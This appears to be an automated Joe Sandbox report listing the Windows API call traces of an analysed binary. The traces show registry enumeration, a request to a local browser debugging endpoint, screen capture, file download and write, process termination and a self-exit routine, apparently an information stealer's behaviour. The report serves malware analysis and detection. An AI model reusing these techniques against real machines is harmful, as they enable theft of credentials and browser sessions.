                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: cfb3897a5a22d652b1bb1a04214257f6ca3ef3a37118c0db83653040ed551a65
                          • Instruction ID: 4afffce4605d1a75ec51afec93a77234444edbd91dbe087508a9a4c28d7718fa
                          • Opcode Fuzzy Hash: cfb3897a5a22d652b1bb1a04214257f6ca3ef3a37118c0db83653040ed551a65
                          • Instruction Fuzzy Hash: FA021D70A012058FCB25DF69D989A6AB7A1EF44308F18847EE405AB3E1D779DC42CFD8
                          APIs
                            • Part of subcall function 004271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004271FE
                          • RegOpenKeyExA.ADVAPI32(?,00FBAFF0,00000000,00020019,?), ref: 004237BD
                          • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004237F7
                          • wsprintfA.USER32 ref: 00423822
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00423840
                          • RegCloseKey.ADVAPI32(?), ref: 0042384E
                          • RegCloseKey.ADVAPI32(?), ref: 00423858
                          • RegQueryValueExA.ADVAPI32(?,00FBDDE0,00000000,000F003F,?,?), ref: 004238A1
                          • lstrlen.KERNEL32(?), ref: 004238B6
                          • RegQueryValueExA.ADVAPI32(?,00FBDD98,00000000,000F003F,?,00000400), ref: 00423927
                          • RegCloseKey.ADVAPI32(?), ref: 00423972
                          • RegCloseKey.ADVAPI32(?), ref: 00423989
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 13140697-3278919252
                          • Opcode ID: 4e9d1cae0e3a2af3057db68a159ca54c7e46fe24ae7588bd7d44b17841373044
                          • Instruction ID: cea90c054b18a974ae4fcbf3100dacfdb3a6551e752be9f2135fa6a3919537d3
                          • Opcode Fuzzy Hash: 4e9d1cae0e3a2af3057db68a159ca54c7e46fe24ae7588bd7d44b17841373044
                          • Instruction Fuzzy Hash: 2391BEB2A002189FCB10DF94ED809DEB7B9FB48310F14816EE509B7251DB79AE41CFA4
                          APIs
                          • InternetOpenA.WININET(0042CFEC,00000001,00000000,00000000,00000000), ref: 004090DF
                          • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004090FC
                          • InternetCloseHandle.WININET(00000000), ref: 00409109
                          • InternetReadFile.WININET(?,?,?,00000000), ref: 00409166
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409197
                          • InternetCloseHandle.WININET(00000000), ref: 004091A2
                          • InternetCloseHandle.WININET(00000000), ref: 004091A9
                          • strlen.MSVCRT ref: 004091BA
                          • strlen.MSVCRT ref: 004091ED
                          • strlen.MSVCRT ref: 0040922E
                          • strlen.MSVCRT ref: 0040924C
                            • Part of subcall function 00408980: std::_Xinvalid_argument.LIBCPMT ref: 00408996
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                          • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                          • API String ID: 1530259920-2144369209
                          • Opcode ID: 0705428bbcfa598ed41d0b8a19cc95d4e080841770a1eefc8c5b6b07f42995b4
                          • Instruction ID: 37aafcde9dc8677222a14fe08098824145c1bcf6f4b2fcbe97b14dd3a3e353a1
                          • Opcode Fuzzy Hash: 0705428bbcfa598ed41d0b8a19cc95d4e080841770a1eefc8c5b6b07f42995b4
                          • Instruction Fuzzy Hash: F251C471700205ABE710DBA8DC45BDEF7FADB48710F14016AF904E72C1DBB8AA4487A9
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 004216A1
                          • lstrcpy.KERNEL32(00000000,00FAAEB0), ref: 004216CC
                          • lstrlen.KERNEL32(?), ref: 004216D9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004216F6
                          • lstrcat.KERNEL32(00000000,?), ref: 00421704
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0042172A
                          • lstrlen.KERNEL32(00FBA0A8), ref: 0042173F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00421762
                          • lstrcat.KERNEL32(00000000,00FBA0A8), ref: 0042176A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421792
                          • ShellExecuteEx.SHELL32(?), ref: 004217CD
                          • ExitProcess.KERNEL32 ref: 00421803
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                          • String ID: <
                          • API String ID: 3579039295-4251816714
                          • Opcode ID: d8a4b448b3cbd2fec1d6e41789f4e9dc9c9ba109b5cf32146fe5b58423eccd26
                          • Instruction ID: f659c962d449d528c0de98020f3ba008cf9020a16bed5b03d1e21acbc4105001
                          • Opcode Fuzzy Hash: d8a4b448b3cbd2fec1d6e41789f4e9dc9c9ba109b5cf32146fe5b58423eccd26
                          • Instruction Fuzzy Hash: C5518070A012299BDB11DFA5DD84A9FB7FAAF94300F40513AE505E33A1DB74AE058F98
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041EFE4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041F012
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041F026
                          • lstrlen.KERNEL32(00000000), ref: 0041F035
                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 0041F053
                          • StrStrA.SHLWAPI(00000000,?), ref: 0041F081
                          • lstrlen.KERNEL32(?), ref: 0041F094
                          • lstrlen.KERNEL32(00000000), ref: 0041F0B2
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F0FF
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F13F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$AllocLocal
                          • String ID: ERROR
                          • API String ID: 1803462166-2861137601
                          • Opcode ID: 1254e741c4c66394e964bd9e4527e280da5e45af26195386c32257c4f856ff08
                          • Instruction ID: e22b173a79ada993f9a8a1c07171ccda291608974229222064182065bbebafd3
                          • Opcode Fuzzy Hash: 1254e741c4c66394e964bd9e4527e280da5e45af26195386c32257c4f856ff08
                          • Instruction Fuzzy Hash: F951A031A102019FCB21AF79DC49AAB77A5AF44304F04517EF849AB392DB78DC468B98
                          APIs
                          • GetEnvironmentVariableA.KERNEL32(00FB8970,00639BD8,0000FFFF), ref: 0040A026
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040A053
                          • lstrlen.KERNEL32(00639BD8), ref: 0040A060
                          • lstrcpy.KERNEL32(00000000,00639BD8), ref: 0040A08A
                          • lstrlen.KERNEL32(00434C4C), ref: 0040A095
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A0B2
                          • lstrcat.KERNEL32(00000000,00434C4C), ref: 0040A0BE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A0E4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040A0EF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A114
                          • SetEnvironmentVariableA.KERNEL32(00FB8970,00000000), ref: 0040A12F
                          • LoadLibraryA.KERNEL32(00FBD6E8), ref: 0040A143
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                          • String ID:
                          • API String ID: 2929475105-0
                          • Opcode ID: 82ba748268051fe5188cce3ae7938c6ffc81754323684e600c663be949974750
                          • Instruction ID: 7d912217e2c1cdd1b5579b186059a9d855d1cfaca40abc7576ab747b41788514
                          • Opcode Fuzzy Hash: 82ba748268051fe5188cce3ae7938c6ffc81754323684e600c663be949974750
                          • Instruction Fuzzy Hash: 7D9190306007009FD7319FA4DC88AA736A6AB94705F50507AF805AB3E2EFBDDD508BD6
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041C8A2
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041C8D1
                          • lstrlen.KERNEL32(00000000), ref: 0041C8FC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041C932
                          • StrCmpCA.SHLWAPI(00000000,00434C3C), ref: 0041C943
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 22e2815f99eb4bebc5cbde40df01183566fb2abad0536647897f89be00fadbf9
                          • Instruction ID: 99e82f24fe39c89555339a76d2e1fc7fd259bc8c0b3e81e4d7877e8eb3653008
                          • Opcode Fuzzy Hash: 22e2815f99eb4bebc5cbde40df01183566fb2abad0536647897f89be00fadbf9
                          • Instruction Fuzzy Hash: FC61B171E902199BDB11EFB58DC8BEF7BB9AF05740F10002AE841E7381D77889458BE9
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00420CF0), ref: 00424276
                          • GetDesktopWindow.USER32 ref: 00424280
                          • GetWindowRect.USER32(00000000,?), ref: 0042428D
                          • SelectObject.GDI32(00000000,00000000), ref: 004242BF
                          • GetHGlobalFromStream.COMBASE(00420CF0,?), ref: 00424336
                          • GlobalLock.KERNEL32(?), ref: 00424340
                          • GlobalSize.KERNEL32(?), ref: 0042434D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                          • String ID:
                          • API String ID: 1264946473-0
                          • Opcode ID: 4df049b90167f18abc31d218c70bb12806ecc89bd0e67f63d31103b3401f95cd
                          • Instruction ID: eb4780d50b61bbb4fe54e0ab5ed906a0b4982877679e062fe34ca6faa184e236
                          • Opcode Fuzzy Hash: 4df049b90167f18abc31d218c70bb12806ecc89bd0e67f63d31103b3401f95cd
                          • Instruction Fuzzy Hash: 72512E75A10208AFDB10DFA5ED89AEEB7B9EF48304F10541AF905E3290DB74AD05CFA4
                          APIs
                          • lstrcat.KERNEL32(?,00FBE020), ref: 0041E00D
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041E037
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E06F
                          • lstrcat.KERNEL32(?,00000000), ref: 0041E07D
                          • lstrcat.KERNEL32(?,?), ref: 0041E098
                          • lstrcat.KERNEL32(?,?), ref: 0041E0AC
                          • lstrcat.KERNEL32(?,00FAB338), ref: 0041E0C0
                          • lstrcat.KERNEL32(?,?), ref: 0041E0D4
                          • lstrcat.KERNEL32(?,00FBD588), ref: 0041E0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0041E126
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 4230089145-0
                          • Opcode ID: ad19b1581edb05993551cdc68ca35f4d831bd1402a2252a48962e02a2718f3cf
                          • Instruction ID: cc61a0fd2022bd44df843706e61332b767ad8f1904ff0946a220dc2a2cd5f11a
                          • Opcode Fuzzy Hash: ad19b1581edb05993551cdc68ca35f4d831bd1402a2252a48962e02a2718f3cf
                          • Instruction Fuzzy Hash: 58617075A1011CABCB55DB64CD48ADE77B5BF48300F1049AAFA0AA3290DFB49F858F94
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00406AFF
                          • InternetOpenA.WININET(0042CFEC,00000001,00000000,00000000,00000000), ref: 00406B2C
                          • StrCmpCA.SHLWAPI(?,00FBE538), ref: 00406B4A
                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00406B6A
                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406B88
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406BA1
                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00406BC6
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406BF0
                          • CloseHandle.KERNEL32(00000000), ref: 00406C10
                          • InternetCloseHandle.WININET(00000000), ref: 00406C17
                          • InternetCloseHandle.WININET(?), ref: 00406C21
                          Yara matches
                          Similarity
                          • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                          • String ID:
                          • API String ID: 2500263513-0
                          • Opcode ID: 917f675ddc84d86bb4b15c12f684a95ab0bafc993a086ba79af1a324fa0f715f
                          • Instruction ID: c5ad55131c4ce7db38fffddb58cb683fbd38acd074282c5770988a30aae92a0f
                          • Opcode Fuzzy Hash: 917f675ddc84d86bb4b15c12f684a95ab0bafc993a086ba79af1a324fa0f715f
                          • Instruction Fuzzy Hash: 734171B1600215ABDB24DF64DC89FAE77B9EB44704F004469FA06E72C0DF74AE448BA8
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00414F39), ref: 00424545
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0042454C
                          • wsprintfW.USER32 ref: 0042455B
                          • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004245CA
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004245D9
                          • CloseHandle.KERNEL32(00000000,?,?), ref: 004245E0
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                          • String ID: 9OA$%hs$9OA
                          • API String ID: 885711575-2887891451
                          • Opcode ID: c6061c17c14f2bf59568cb40a23737b7e44df780ea9a98ad1f2c030f43cf0d92
                          • Instruction ID: 346fc250c6ad360f339df3eea786a7fcde9f53112dcb33079fd12cc933be49ee
                          • Opcode Fuzzy Hash: c6061c17c14f2bf59568cb40a23737b7e44df780ea9a98ad1f2c030f43cf0d92
                          • Instruction Fuzzy Hash: 49313E72B00215BBDB10DBA4EC89FDE7779EF45740F10405AFA05E7180DBB4AA458BA9
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040BC1F
                          • lstrlen.KERNEL32(00000000), ref: 0040BC52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040BC7C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040BC84
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040BCAC
                          • lstrlen.KERNEL32(00434AD4), ref: 0040BD23
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: 8c7ae8d9145d9521553447a705b0b53fd086f1c9fe675d944289f12c0e91ea3f
                          • Instruction ID: 37072dd1b280c51efd76c48aba3edd40c61a6322b10c9e257032049fce7c4c6e
                          • Opcode Fuzzy Hash: 8c7ae8d9145d9521553447a705b0b53fd086f1c9fe675d944289f12c0e91ea3f
                          • Instruction Fuzzy Hash: 5AA13D30A012058FDB25DF69D949A9AB7B1EF44308F14907EE806A73E1DB79DC45CF98
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00425F2A
                          • std::_Xinvalid_argument.LIBCPMT ref: 00425F49
